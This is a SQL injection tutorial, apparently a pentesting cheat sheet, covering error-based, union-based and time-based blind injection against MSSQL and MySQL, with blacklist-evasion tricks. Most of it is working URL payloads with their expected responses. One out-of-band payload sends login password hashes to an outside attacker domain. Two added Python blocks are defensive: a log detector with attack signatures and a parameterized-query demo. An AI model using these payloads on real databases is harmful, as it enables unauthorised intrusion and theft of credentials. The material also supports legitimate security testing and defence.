SQL Injection


======================
Intro to SQL INJECTION
======================

* Classes of SQLI
-----------------

SQL Injection can be broken up into 3 classes:

1. Inband - data is extracted using the same channel that is used to inject the SQL code.
This is the most straightforward kind of attack, in which the retrieved data is presented
directly in the application web page.

2. Out-of-Band - data is retrieved using a different channel (e.g.: an email with the results of
the query is generated and sent to the tester).

3. Inferential - there is no actual transfer of data, but the tester is able to reconstruct the
information by sending particular requests and observing the resulting behaviour of the
website/DB Server.

Inband:
-------
Data is extracted using the same channel that is used to inject the SQL code.

This is the most straightforward kind of attack, in which the retrieved data is presented directly in the application web page

So these are our Error-Based and Union-Based SQL Injections.

http://[site]/page.asp?id=1 or 1=convert(int,(USER))--

Syntax error converting the nvarchar value '[j0e]' to a column of data type int.

Database says: Hey dude!!! You are converting the nvarchar value '[j0e]' to a column of data type int, are you an idiot?

Out of band:
------------
Data is retrieved using a different channel (e.g.: an email with the results of the query is generated and sent to the tester).
This is another way of getting the data out of the server (for example over HTTP or DNS).

http://[site]/page.asp?id=1;declare @host varchar(800); select @host = name + '-' +master.sys.fn_varbintohexstr(password_hash) + '.2.pwn3dbyj0e.com' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--

Inferential:
------------
If the application returns an error message generated by an incorrect query, then it is easy to reconstruct the logic of the original query and therefore
understand how to perform the injection correctly. However, if the application hides the error details, then the tester must be
able to reverse engineer the logic of the original query. The latter case is known as "Blind SQL Injection".

http://[site]/page.asp?id=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:10'--

Ask it if it's running as 'sa'.

What About Tools????
--------------------

Automated tools are a great way to identify SQLI... yeah, they are... just be conscious of the
different SQL Injection types.

SQL Vuln Scanners
-----------------
So let's start with some tools you can use to identify SQLI, as well as
the type they generally identify.

mieliekoek.pl------->(error based)
wpoison------------->(error based)
sqlmap-------------->(blind by default, and union if you specify)
wapiti-------------->(error based)
w3af---------------->(error, blind)
paros--------------->(error, blind)
sqid---------------->(error)


SQL Injection Types
-------------------
1. Error-Based SQL Injection
2. Union-Based SQL Injection
3. Blind SQL Injection

Error: Asking the DB a question that will cause an error, and gleaning information from the error.

Union: The SQL UNION is used to combine the results of two or more SELECT SQL statements into a single result. Really useful for SQL Injection :)

Blind: Asking the DB a true/false question and using either whether the valid page is returned or not, or the time it takes for your valid page to return,
as the answer to the question.
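As an added defensive illustration (not code from the original post): each of the three types above, plus the out-of-band and column-enumeration probes shown elsewhere in this post, leaves a recognisable trace in web server logs. The log lines, client addresses and 5-second stall threshold below are constructed for the example, and classify/scan are names chosen here.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the original post), in a simplified
# IIS/W3C-style layout: client-ip method path query status time-taken-ms
SAMPLE_LOG = r"""10.0.0.5 GET /page.asp id=1 200 12
10.0.0.9 GET /page.asp id=1+or+1=convert(int,(USER))-- 500 15
10.0.0.9 GET /page.asp id=1+UNION+SELECT+ALL+1,2,3,4-- 200 14
10.0.0.9 GET /page.asp id=1;+IF+(LEN(USER)=3)+WAITFOR+DELAY+'00:00:10'-- 200 10031
10.0.0.9 GET /page.asp id=1;declare+@host+varchar(800);exec('xp_fileexist+''\\'+%2B+@host+''')-- 200 40
10.0.0.7 GET /page.asp id=1+having+1=1-- 500 13
10.0.0.7 GET /page.php id=1+order+by+10/* 500 9
10.0.0.5 GET /page.asp id=42 200 11
"""

LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<query>\S+) "
                    r"(?P<status>\d{3}) (?P<ms>\d+)$")

# One signature per injection class the post describes; matched on the decoded query.
SIGNATURES = {
    "error-based": re.compile(r"\bconvert\s*\(\s*int\b|\bhaving\s+1\s*=\s*1\b", re.I),
    "union-based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "blind-time":  re.compile(r"\bwaitfor\s+delay\b", re.I),
    "out-of-band": re.compile(r"\bxp_fileexist\b|\bfn_varbintohexstr\b", re.I),
    "column-enum": re.compile(r"\border\s+by\s+\d+\s*(/\*|--)", re.I),
}

def classify(line):
    """Return a dict describing the request and the signatures it tripped, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = unquote_plus(m["query"])  # decode %xx and '+' so signatures see the raw SQL
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    # A WAITFOR probe is only confirmed if the server actually stalled (>= 5 s here).
    if "blind-time" in hits and int(m["ms"]) >= 5000:
        hits.append("delay-observed")
    return {"ip": m["ip"], "query": query, "status": int(m["status"]), "hits": hits}

def scan(log_text):
    """Return (alerts, requests-flagged-per-client) for every request that tripped a signature."""
    results = (classify(l) for l in log_text.splitlines())
    alerts = [r for r in results if r and r["hits"]]
    return alerts, Counter(a["ip"] for a in alerts)

if __name__ == "__main__":
    alerts, per_ip = scan(SAMPLE_LOG)
    for a in alerts:
        print(f'{a["ip"]} {a["status"]} {a["hits"]}: {a["query"]}')
    print("requests flagged per client:", dict(per_ip))
```

A 500 status alongside an error-based hit, or a per-client count that keeps climbing on the same parameter, is the signal worth alerting on; a single hit on its own is often a scanner.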

Methodology for how to test for SQL Injection
---------------------------------------------

Identify
--------

Identify Injection point (Tool or Manual)
Determine Injection Type (Integer or String)

Attack
------
Error-Based SQL Injection (gleaning errors and constructing our query based on those errors)

Union-Based SQL Injection (great for data extraction)

Blind SQL Injection (worst case... last resort)


Determine the Injection Type
----------------------------

Is it integer or string based?

1. Integer Injection:
http://[site]/page.asp?id=1 having 1=1--

Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.

2. String Injection:

http://[site]/page.asp?id=x' having 1=1--

Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.

Determining this is what tells you whether you need a ' (tick) or not: if integer based, no ' (tick) is needed; if string based, a ' (tick) is required.


Error-Based SQL Injection Syntax for extracting the USER
--------------------------------------------------------

http://[site]/page.asp?id=1 or 1=convert(int,(USER))--

Syntax error converting the nvarchar value '[DB USER]' to a column of data type int.

Grab the database user with USER

Grab the database name with DB_NAME

Grab the server name with @@servername

Grab the Windows/OS version with @@version

Union-Based SQL Injection Syntax for extracting the USER
--------------------------------------------------------

http://[site]/page.asp?id=1 UNION SELECT ALL 1--

All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--

All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--

All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--

NO ERROR

http://[site]/page.asp?id=null UNION SELECT ALL 1,USER,3,4--

Blind SQL Injection Syntax for extracting the USER
---------------------------------------------------
3 - total characters in the user name (DBO, for example)

http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay




Blind SQL Injection Syntax for extracting the USER
--------------------------------------------------

Let's go to a Linux shell and type man ascii; use the ASCII chart to enumerate the user name.

D - 1st character (ASCII value for D in the ASCII chart)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay


B - 2nd Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Valid page returns after 10 second delay


O - 3rd Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>98) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
.....and so on

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay

Database User = DBO

MySQL
-----
With MySQL you will typically use union or true/false blind SQL Injection so
you really need to know a lot about the DB you are attacking such as:
* number of columns
* column names
* path to website

So you will need to enumerate this information first. The UNION operator is used to combine the result-set of two or more SELECT statements. Notice that each SELECT statement within the UNION must have the same number of columns. The columns must also have similar data types. Also, the columns in each SELECT statement must be in the same order.

Column number enumeration
-------------------------
http://[site]/page.php?id=1 order by 10/* <-- gives Unknown column '10' in 'order clause'

http://[site]/page.php?id=1 order by 5/* <-- gives a valid page

http://[site]/page.php?id=1 order by 6/* <-- gives Unknown column '6' in 'order clause'

So now we know there are 5 columns. By the way you can do this with MSSQL as well.


Building the union
------------------
http://[site]/page.php?id=1 union all select 1,2,3,4,5/* <-- gives a valid page

Change the first part of the query to a null or negative value so we can see
what field will echo data back to us.

http://[site]/page.php?id=-1 union all select 1,2,3,4,5/* <-- gives a valid page but with the numbers 2 and 3 on it

or

http://[site]/page.php?id=null union all select 1,2,3,4,5/* <-- gives a valid page but with the numbers 2 and 3 on it

Now we know that column numbers 2 and 3 will echo data back to us.

http://[site]/page.php?id=null union all select 1,user(),@@version,4,5/* <-- asking the DB to pass the user and version of the MySQL DB back through the vulnerable columns


Information Gathering using MySQL injection
-------------------------------------------

http://[site]/page.php?id=null union all select 1,user(),3,4,5/*

http://[site]/page.php?id=null union all select 1,2,database(),4,5/*

http://[site]/page.php?id=null union all select 1,@@version,@@datadir,4,5/*

Grab the database user with user()

Grab the database name with database()

Grab the database version with @@version

Grab the database data directory with @@datadir



Filter Evasion for SQL injection
--------------------------------

I know that people often think this stuff is very black and white, cut and dry, but the simple truth with SQL injection is that sometimes you just have a gut feeling that you are looking at a vulnerable page.

You've tried a bunch of things but for some reason nothing seems to be working. You may be facing some sort of filtering. Maybe the developer has attempted to stop SQL injection by only allowing alphanumeric characters as input.

1. Client-Side Filtering
The first thing that we want to do is determine if the filtering is client-side (ex: being done with JavaScript). View the source code and look for any parameters being passed to the website that may be filtered with JavaScript/VBScript. Filtering that the client can simply remove is bad, bad, bad: it is prone to replay attacks.

Hey developers, a simple question: if you use only client-side filtering, you are putting all of your web app security on the hacker's laptop. Does that pass a common sense test?

- Save the page locally and remove the offending JavaScript/VBScript
or
- Use a local proxy (ex: Paros, WebScarab, Burp Suite)

Restrictive Blacklist
---------------------
Server-side Alphanumeric Filter
http://[site]/page.asp?id=2 or 1 like 1

Here we are doing an "or true", although this time we are using the "like" comparison instead of the "=" sign. We can use this same technique for the other
variants, such as "and 1 like 1" or "and 1 like 2":
http://[site]/page.asp?id=2 and 1 like 1
http://[site]/page.asp?id=2 and 1 like 2
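To show why the blacklist above fails and what ends the problem for both the union-based and the "or 1 like 1" cases, here is an added Python/sqlite3 example that is not code from the original post: the string-concatenation pattern behind page.asp?id=, the restrictive blacklist beside it, and the bound, allowlisted version. The tables, rows, 'hash-placeholder' value and function names are all constructed for this example.

```python
import sqlite3

def make_db():
    """Constructed in-memory schema (not from the original post): a public page table
    and a users table the application never intends to expose."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE page(id INTEGER, title TEXT, body TEXT);
        INSERT INTO page VALUES (1, 'Home', 'welcome'), (2, 'About', 'about us');
        CREATE TABLE users(id INTEGER, name TEXT, pw_hash TEXT);
        INSERT INTO users VALUES (1, 'dbo', 'hash-placeholder');
    """)
    return db

def lookup_vulnerable(db, id_param):
    # The page.asp?id= pattern from the post: the raw parameter is pasted into the SQL text,
    # so "2 or 1 like 1" or "null union all select ..." is executed as SQL.
    return db.execute("SELECT id, title, body FROM page WHERE id = " + id_param).fetchall()

def lookup_blacklist(db, id_param):
    # A "restrictive blacklist": reject characters an injection is expected to need.
    # It never changes the query shape, so "or 1 like 1" (no quote, no '=') still gets through.
    if any(c in id_param for c in "'=-;"):
        raise ValueError("rejected by blacklist")
    return lookup_vulnerable(db, id_param)

def lookup_safe(db, id_param):
    # Allowlist the shape (this parameter is an integer, nothing else) and bind the value.
    # Binding alone already stops the value from being parsed as SQL; the allowlist
    # turns probes into a clean, loggable error instead of an empty page.
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    return db.execute("SELECT id, title, body FROM page WHERE id = ?", (int(id_param),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    probe = "2 or 1 like 1"
    print("vulnerable:", lookup_vulnerable(db, probe))   # every page row comes back
    print("blacklist: ", lookup_blacklist(db, probe))    # same: the blacklist never fires
    try:
        lookup_safe(db, probe)
    except ValueError as e:
        print("safe:      ", e)
```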
